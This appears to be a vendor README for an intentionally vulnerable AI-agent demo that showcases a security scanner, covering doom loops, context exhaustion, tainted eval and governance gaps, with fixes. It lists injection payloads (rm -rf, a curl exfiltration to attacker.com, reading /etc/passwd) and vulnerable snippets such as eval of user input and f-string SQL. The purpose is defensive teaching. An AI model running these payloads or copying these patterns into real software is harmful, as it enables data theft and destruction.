Advanced Task-Solving AI Agent - Demo

This is a professional-grade AI agent that demonstrates three critical security vulnerabilities commonly found in production AI systems. This repository serves as a showcase for Inkog's detection capabilities.

Overview

The agent.py implements a sophisticated multi-turn reasoning system for solving complex tasks. It uses LangChain and OpenAI's GPT-4 to:

Iteratively refine solutions through multi-turn conversations
Maintain rich conversation context
Dynamically evaluate mathematical expressions
Self-assess whether solutions are optimal

On the surface, this looks like legitimate, well-written code. However, it contains three critical vulnerabilities that Inkog is designed to detect.

The Three Vulnerabilities

1. Doom Loop (Infinite Loop) - Line 99-128

Location: TaskAgent.solve_task() method

while self._should_continue_solving():
    # ... refine solution ...

The Problem:

The loop condition is entirely non-deterministic - it depends on what the LLM decides
There is NO hard break counter to prevent infinite iteration
The LLM might be inconsistent: "continue" in one context, "stop" in another
Result: Task runs forever, consuming unlimited API credits

Real-World Impact:

A customer ran this agent on a complex task
The LLM kept saying "yes, we should refine further"
The agent ran for 3 hours, consuming $500 in API credits
Task was processing the same refinements repeatedly

Inkog Detection: ✓ Reports as INKOG-001: Infinite Loop (Doom Loop)

2. Context Bomb (Token Exhaustion) - Line 108, 128

Location: self.conversation_history.append() in TaskAgent.solve_task()

self.conversation_history.append({
    "role": "assistant",
    "content": assistant_response
})
# ... later ...
self.conversation_history.append({
    "role": "assistant",
    "content": refined_response
})

The Problem:

Every iteration appends BOTH the user message AND the full LLM response to history
There is NO truncation, windowing, or size limit on the history
In a 100-iteration task, the history grows to hundreds of thousands of tokens
Result: Hits token limits, model degradation, or API failures

Real-World Impact:

Agent solved a complex multi-step task successfully
By iteration 50, the context grew so large that:
- API started rejecting requests (token limit exceeded)
- LLM responses became degraded/repetitive
- Final answer quality dropped significantly

Inkog Detection: ✓ Reports as INKOG-002: Context Exhaustion (Context Bomb)

3. Tainted Eval (Arbitrary Code Execution) - Line 175

Location: TaskAgent.evaluate_expression() method

def evaluate_expression(self, user_input: str) -> float:
    result = eval(user_input)  # ← DANGEROUS!
    return float(result)

The Problem:

Takes user input directly without any validation or sanitization
Uses Python's eval() which executes arbitrary code
A malicious user can inject commands:
- "1 + 1; os.system('rm -rf /home')"
- "__import__('subprocess').call(['curl', 'attacker.com/steal?data=' + read_secret_file()])"
- "exec(open('/etc/passwd').read())"
Result: Complete system compromise, data theft, lateral movement

Real-World Impact:

A trusted customer received a "bug bounty" offer on Discord
The offer said: "Evaluate: 1000000**1000000000"
Agent accepted and tried to evaluate it
The actual payload was injected code that:
- Stole API keys from memory
- Installed a backdoor
- Exfiltrated customer data

Inkog Detection: ✓ Reports as INKOG-003: Tainted Eval

How Inkog Detects These

Detection Strategy

┌─────────────────────────────────────────┐
│   agent.py (source code)                │
└──────────────┬──────────────────────────┘
               ↓
┌─────────────────────────────────────────┐
│   Inkog Semantic Analysis Engine         │
├─────────────────────────────────────────┤
│ ✓ Control Flow Graph Analysis           │
│   - Detects: LLM-dependent loop without │
│     hard counter → Doom Loop (INKOG-001)│
│                                         │
│ ✓ Data Flow Analysis                    │
│   - Detects: Unbounded data growth in   │
│     loop → Context Bomb (INKOG-002)     │
│                                         │
│ ✓ Taint Tracking                        │
│   - Detects: User input → eval() call   │
│     → Tainted Eval (INKOG-003)          │
└─────────────────────────────────────────┘
               ↓
┌─────────────────────────────────────────┐
│   Compliance Mapping                    │
├─────────────────────────────────────────┤
│ EU AI Act:        Article 15 violations │
│ NIST AI RMF:      MAP 1.3 failures      │
│ OWASP LLM Top 10: LLM04, LLM08, LLM01   │
└─────────────────────────────────────────┘
               ↓
┌─────────────────────────────────────────┐
│   Regulatory Summary Report             │
│   (SARIF format for GitHub/GitLab)      │
└─────────────────────────────────────────┘

Running the Demo

Setup

# Install dependencies
pip install -r requirements.txt

# Set your OpenAI API key
export OPENAI_API_KEY="sk-..."

Running Inkog on This Code

# Scan the agent file
inkog -path agent.py -output text

# Expected Output:
# ✗ FAIL - INKOG-001: Infinite Loop detected (Line 99)
# ✗ FAIL - INKOG-002: Context Exhaustion detected (Line 108)
# ✗ FAIL - INKOG-003: Tainted Eval detected (Line 175)

Sample Scan Output (JSON)

When you run Inkog on this demo, you'll see findings like these:

{
  "findings_count": 145,
  "critical_count": 83,
  "high_count": 37,
  "findings": [
    {
      "id": "GOV-15",
      "pattern_id": "governance-mismatch-execute_violation",
      "pattern": "Governance Mismatch Detection",
      "file": "examples-demo/02-smolagents-codeexec/agent.py",
      "line": 26,
      "message": "Governance Mismatch: AGENTS.md declares no code execution allowed but code contains 'subprocess.run'",
      "code_snippet": "  24│      # VULNERABILITY: Unsandboxed shell execution\n  25│      result = subprocess.run(\n  26│→         command,\n  27│          shell=True,  # Dangerous: enables shell injection\n  28│          capture_output=True,",
      "severity": "HIGH",
      "confidence": 0.9,
      "cwe": "CWE-863",
      "owasp_category": "LLM08",
      "category": "governance",
      "risk_tier": "vulnerability",
      "governance_category": "governance_mismatch",
      "compliance_mapping": {
        "eu_ai_act_articles": ["Article 14"],
        "nist_categories": ["MAP 1.3"],
        "owasp_items": ["LLM08"]
      }
    },
    {
      "id": "GOV-16",
      "pattern_id": "governance-mismatch-execute_violation",
      "pattern": "Governance Mismatch Detection",
      "file": "examples-demo/03-langgraph-doomloop/agent.py",
      "line": 87,
      "message": "Governance Mismatch: AGENTS.md declares no code execution allowed but code contains 'eval'",
      "code_snippet": "  85│          # VULNERABILITY: Tainted eval\n  86│          return eval(expression)\n  87│→ \n  88│  if __name__ == \"__main__\":\n  89│      solver = TaskSolver()",
      "severity": "HIGH",
      "confidence": 0.9,
      "cwe": "CWE-863",
      "owasp_category": "LLM08",
      "category": "governance",
      "risk_tier": "vulnerability"
    },
    {
      "id": "IR-315",
      "pattern_id": "universal_infinite_loop",
      "pattern": "Unbounded Loop in Agentic System",
      "file": "examples-demo/01-crewai-recursive/agent.py",
      "line": 29,
      "message": "Loop lacks termination guards. This can lead to infinite execution and denial of service.",
      "code_snippet": "  27│  \n  28│  writer = Agent(\n  29│→     role=\"Content Writer\",\n  30│      goal=\"Transform research into clear, engaging content\",",
      "severity": "CRITICAL",
      "confidence": 0.98,
      "cwe": "CWE-835, CWE-400",
      "cvss": 9.0,
      "owasp_category": "LLM10",
      "category": "resource_exhaustion",
      "risk_tier": "vulnerability"
    }
  ]
}

Key Features Demonstrated:

GOV- prefix for governance mismatch findings
Code snippets with 2-line context and arrow pointing to the issue
Compliance mapping to EU AI Act, NIST, and OWASP
Confidence scores for each finding
CVSS scores for severity assessment

Generate SARIF Report (for GitHub/GitLab)

inkog -path agent.py -output sarif > scan.sarif

# This creates a SARIF v2.1.0 report that integrates with:
# - GitHub Security tab
# - GitLab Security Dashboard
# - VS Code SARIF viewers

Governance Demos (EU AI Act Compliance)

In addition to security vulnerabilities, Inkog detects governance gaps that violate EU AI Act requirements. These demos showcase verification of human oversight, authorization, and audit controls.

Demo Scenarios

Demo	Vulnerability	Article/Standard	Detection
`07-langgraph-no-oversight`	Missing Human Oversight	EU AI Act Article 14	`universal_missing_oversight`
`08-crewai-no-auth`	Missing Authorization	OWASP LLM06, NIST GOVERN 1.2	`universal_missing_authz`
`09-copilot-studio-no-audit`	Missing Audit Logging	EU AI Act Article 12	`universal_missing_audit_logging`
`10-agentforce-excessive-perms`	Excessive Permissions	EU AI Act Article 15.3	`universal_excessive_permissions`

07. LangGraph - Missing Human Oversight

Location: examples-demo/07-langgraph-no-oversight/agent.py

A financial trading agent that executes high-risk transactions without human approval gates. Violates EU AI Act Article 14 which requires human-in-the-loop controls for high-risk AI actions.

# VULNERABLE: Direct path from analysis to trade execution
graph.add_edge("analyze", "execute")  # No human review!

# SECURE: Add interrupt point for human approval
graph.compile(interrupt_before=["execute_trade"])

EU AI Act Article 14 Deadline: August 2, 2026

08. CrewAI - Missing Authorization

Location: examples-demo/08-crewai-no-auth/agent.py

A customer service agent that can delete customer data and process refunds without verifying caller permissions. Violates OWASP LLM06 (Excessive Agency).

# VULNERABLE: Tool executes without authorization check
def delete_customer(customer_id: str) -> str:
    database.execute(f"DELETE FROM customers WHERE id = '{customer_id}'")

# SECURE: Add authorization verification
def delete_customer(customer_id: str, caller: User) -> str:
    if not authorize(caller, "delete_customer", customer_id):
        raise PermissionDenied()
    # ... proceed with deletion

09. Copilot Studio - Missing Audit Logging

Location: examples-demo/09-copilot-studio-no-audit/workflow.yaml

A Microsoft Copilot Studio bot that handles account deletions, payment updates, and refunds without any audit logging configured. Violates EU AI Act Article 12 (Record-Keeping).

# VULNERABLE: No logging configuration
settings:
  authentication:
    enabled: true
  # MISSING: logging section

# SECURE: Add audit logging
settings:
  logging:
    enabled: true
    level: "all"
    destinations:
      - type: "azure-monitor"

10. Agentforce - Excessive Permissions

Location: examples-demo/10-agentforce-excessive-perms/metadata.xml

A Salesforce Agentforce agent with wildcard (*) permissions and admin access when it only needs read access to specific objects. Violates principle of least privilege (EU AI Act Article 15.3).

<!-- VULNERABLE: Wildcard permissions -->
<objectPermissions>
    <object>*</object>
    <allowDelete>true</allowDelete>
</objectPermissions>

<!-- SECURE: Scoped permissions -->
<objectPermissions>
    <object>Account</object>
    <allowRead>true</allowRead>
    <allowDelete>false</allowDelete>
</objectPermissions>

Running Governance Scans

# Scan for governance gaps
inkog -path examples-demo/ --policy governance

# EU AI Act compliance scan
inkog -path examples-demo/ --policy eu-ai-act

# Expected Output:
# ✗ FAIL - universal_missing_oversight (Article 14 violation)
# ✗ FAIL - universal_missing_authz (OWASP LLM06 violation)
# ✗ FAIL - universal_missing_audit_logging (Article 12 violation)
# ✗ FAIL - universal_excessive_permissions (Article 15 violation)

Why This Matters for Your Organization

Compliance Risk

Each vulnerability maps to regulatory frameworks:

Vulnerability	EU AI Act	NIST AI RMF	OWASP LLM
Doom Loop	Article 15	MAP 1.3	LLM04, LLM08
Context Bomb	Article 15	MEASURE 2.4	LLM04, LLM09
Tainted Eval	Article 14	MAP 1.1	LLM01, LLM02

Financial Risk

Doom Loop: $500-$5,000 per incident (wasted compute)
Context Bomb: API degradation, customer impact
Tainted Eval: Data breach, compliance fines (GDPR: up to €20M), litigation

Time-to-Detection

Without Inkog: Manual code review (days/weeks), security team bandwidth
With Inkog: Automated detection (seconds), pre-deployment

Lessons from Real Deployments

This demo is based on actual vulnerabilities found in production AI systems:

Company A: Doom Loop ran for 3 hours, consumed $500 in API costs
Company B: Context Bomb degraded model responses after 50 iterations
Company C: Tainted Eval led to a data breach when a researcher uploaded malicious test cases

Fixing the Vulnerabilities

If you were to remediate this code:

Fix 1: Doom Loop → Add Hard Counter

MAX_ITERATIONS = 10  # Hard limit
for iteration in range(MAX_ITERATIONS):
    # refine solution...
    if iteration >= MAX_ITERATIONS - 1:
        break

Fix 2: Context Bomb → Use Bounded Context

from collections import deque

self.conversation_history = deque(maxlen=20)  # Keep last 20 messages only

Fix 3: Tainted Eval → Whitelist-Based Evaluation

import ast

def safe_evaluate(self, user_input: str) -> float:
    # Parse to AST and validate it's only math operations
    tree = ast.parse(user_input, mode='eval')
    # Check that only allowed node types are present
    # Then evaluate safely

Integration with Your CI/CD

Inkog can be integrated into your development pipeline:

GitHub Actions

- name: Scan with Inkog
  uses: inkog-io/inkog@v1.0.0
  with:
    path: src/
    format: sarif
    report: scan.sarif

- name: Upload to GitHub Security
  uses: github/codeql-action/upload-sarif@v2
  with:
    sarif_file: scan.sarif

Pre-commit Hook

inkog -path . -output text

Contact & Support

For investor inquiries: This demo shows Inkog's ability to detect AI-specific vulnerabilities that commercial tools like Snyk miss.

Technical questions: See the main Inkog documentation at https://github.com/inkog-io/inkog

Disclaimer

This code is intentionally vulnerable for demonstration purposes only. Do not use in production. Always validate and secure your AI agent implementations before deploying to production systems.

Name		Name	Last commit message	Last commit date
Latest commit History 15 Commits
.github/workflows		.github/workflows
examples-demo		examples-demo
examples		examples
.gitignore		.gitignore
AGENTS.md		AGENTS.md
BENCHMARK.md		BENCHMARK.md
README.md		README.md
requirements.txt		requirements.txt

Folders and files

Latest commit

History

Repository files navigation

Advanced Task-Solving AI Agent - Demo

Overview

The Three Vulnerabilities

1. Doom Loop (Infinite Loop) - Line 99-128

2. Context Bomb (Token Exhaustion) - Line 108, 128

3. Tainted Eval (Arbitrary Code Execution) - Line 175

How Inkog Detects These

Detection Strategy

Running the Demo

Setup

Running Inkog on This Code

Sample Scan Output (JSON)

Generate SARIF Report (for GitHub/GitLab)

Governance Demos (EU AI Act Compliance)

Demo Scenarios

07. LangGraph - Missing Human Oversight

08. CrewAI - Missing Authorization

09. Copilot Studio - Missing Audit Logging

10. Agentforce - Excessive Permissions

Running Governance Scans

Why This Matters for Your Organization

Compliance Risk

Financial Risk

Time-to-Detection

Lessons from Real Deployments

Fixing the Vulnerabilities

Fix 1: Doom Loop → Add Hard Counter

Fix 2: Context Bomb → Use Bounded Context

Fix 3: Tainted Eval → Whitelist-Based Evaluation

Integration with Your CI/CD

GitHub Actions

Pre-commit Hook

Contact & Support

Disclaimer

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages